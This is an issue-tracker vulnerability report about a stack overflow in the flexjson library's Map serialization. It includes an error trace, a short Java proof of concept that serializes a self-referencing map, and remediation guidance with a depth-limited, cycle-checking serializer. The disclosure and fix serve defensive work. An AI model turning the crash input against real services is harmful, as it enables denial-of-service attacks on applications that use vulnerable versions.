
#50 Stack overflow error caused by flexjson serialization Map

Milestone: 2.0.0
Status: open
Owner: nobody
Labels: None
Priority: 5
Updated: 2023-06-08
Created: 2023-06-08
Creator: guo yifan
Private: No


Description

flexjson before v3.3 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
    at java.base/java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:631)
    at java.base/java.lang.StringBuilder.append(StringBuilder.java:218)
    at flexjson.StringBuilderOutputHandler.write(StringBuilderOutputHandler.java:38)
    at flexjson.JSONContext.writeQuoted(JSONContext.java:346)
    at flexjson.JSONContext.writeName(JSONContext.java:231)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:47)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)

PoC

<dependency>
    <groupId>net.sf.flexjson</groupId>
    <artifactId>flexjson</artifactId>
    <version>3.3</version>
</dependency>
import flexjson.JSONSerializer;

import java.util.HashMap;

public class PoC2 {
    public static void main(String[] args) {
        HashMap<String, Object> map = new HashMap<>();
        map.put("t", map); // the map contains itself, so the object graph is cyclic
        // deepSerialize follows the cycle without bound and ends in StackOverflowError
        String s = new JSONSerializer().deepSerialize(map);
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing. (https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027)
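The following is an added illustration of solution 1, written for this ticket and not taken from flexjson, jackson-databind or GSON: a small recursive serializer for nested Map/List values that carries a depth counter and throws a checked-in-advance exception once a threshold is reached, instead of letting the JVM fail with StackOverflowError. It also keeps an identity-based set of the containers currently being written, which rejects the self-referential map from the PoC above on the first re-entry rather than after thousands of frames. The class name BoundedSerializer, the NestingLimitException type and the threshold values are assumptions chosen for the example; solution 2 (an explicit stack instead of recursion) is not shown here.

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.IdentityHashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;

/** Illustrative depth-bounded serializer for nested Map/List/scalar values (not flexjson code). */
public final class BoundedSerializer {

    /** Raised instead of letting recursion run into StackOverflowError. */
    public static final class NestingLimitException extends RuntimeException {
        NestingLimitException(String msg) { super(msg); }
    }

    private final int maxDepth;                       // hypothetical threshold, as in the jackson-databind fix
    private final Set<Object> ancestors =             // containers currently being written, compared by identity
            Collections.newSetFromMap(new IdentityHashMap<>());
    private final StringBuilder out = new StringBuilder();

    public BoundedSerializer(int maxDepth) { this.maxDepth = maxDepth; }

    public static String serialize(Object value, int maxDepth) {
        BoundedSerializer s = new BoundedSerializer(maxDepth);
        s.write(value, 0);
        return s.out.toString();
    }

    private void write(Object value, int depth) {
        if (value == null) { out.append("null"); return; }
        if (value instanceof String) { writeQuoted((String) value); return; }
        if (value instanceof Number || value instanceof Boolean) { out.append(value); return; }
        if (value instanceof Map) { writeMap((Map<?, ?>) value, depth); return; }
        if (value instanceof List) { writeList((List<?>) value, depth); return; }
        writeQuoted(String.valueOf(value));             // fallback for any other type
    }

    /** Checked once per container: depth threshold first, then the cycle check. */
    private void enter(Object container, int depth) {
        if (depth >= maxDepth) {
            throw new NestingLimitException("nesting depth " + depth + " exceeds limit " + maxDepth);
        }
        if (!ancestors.add(container)) {
            throw new NestingLimitException("cyclic reference detected at depth " + depth);
        }
    }

    private void writeMap(Map<?, ?> map, int depth) {
        enter(map, depth);
        try {
            out.append('{');
            boolean first = true;
            for (Map.Entry<?, ?> e : map.entrySet()) {
                if (!first) out.append(',');
                first = false;
                writeQuoted(String.valueOf(e.getKey()));
                out.append(':');
                write(e.getValue(), depth + 1);
            }
            out.append('}');
        } finally {
            ancestors.remove(map);                    // leaving the container, so it may legitimately appear again
        }
    }

    private void writeList(List<?> list, int depth) {
        enter(list, depth);
        try {
            out.append('[');
            for (int i = 0; i < list.size(); i++) {
                if (i > 0) out.append(',');
                write(list.get(i), depth + 1);
            }
            out.append(']');
        } finally {
            ancestors.remove(list);
        }
    }

    private void writeQuoted(String s) {
        out.append('"');
        for (char c : s.toCharArray()) {
            if (c == '"' || c == '\\') out.append('\\').append(c);
            else if (c < 0x20) out.append(String.format("\\u%04x", (int) c));
            else out.append(c);
        }
        out.append('"');
    }

    public static void main(String[] args) {
        Map<String, Object> ok = new HashMap<>();
        ok.put("a", List.of(1, 2, Map.of("b", "c")));
        System.out.println(serialize(ok, 100));       // {"a":[1,2,{"b":"c"}]}

        Map<String, Object> self = new HashMap<>();   // same shape as the ticket's PoC: the map contains itself
        self.put("t", self);
        try {
            serialize(self, 100);
        } catch (NestingLimitException e) {
            System.out.println("rejected: " + e.getMessage());   // cyclic reference detected at depth 1
        }

        Object deep = "leaf";                         // deep but acyclic input: 10000 nested lists
        for (int i = 0; i < 10_000; i++) deep = new ArrayList<>(List.of(deep));
        try {
            serialize(deep, 1000);
        } catch (NestingLimitException e) {
            System.out.println("rejected: " + e.getMessage());   // nesting depth 1000 exceeds limit 1000
        }
    }
}
```

The depth check bounds stack use for any input, cyclic or merely deep, and is the cheaper guard to port into a transformer chain such as flexjson's MapTransformer/TransformerWrapper recursion seen in the error log; the identity set is an extra that turns the PoC's cycle into an immediate, descriptive error rather than a generic limit violation.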

References

  1. https://github.com/jettison-json/jettison/issues/52
  2. https://github.com/jettison-json/jettison/pull/53/files
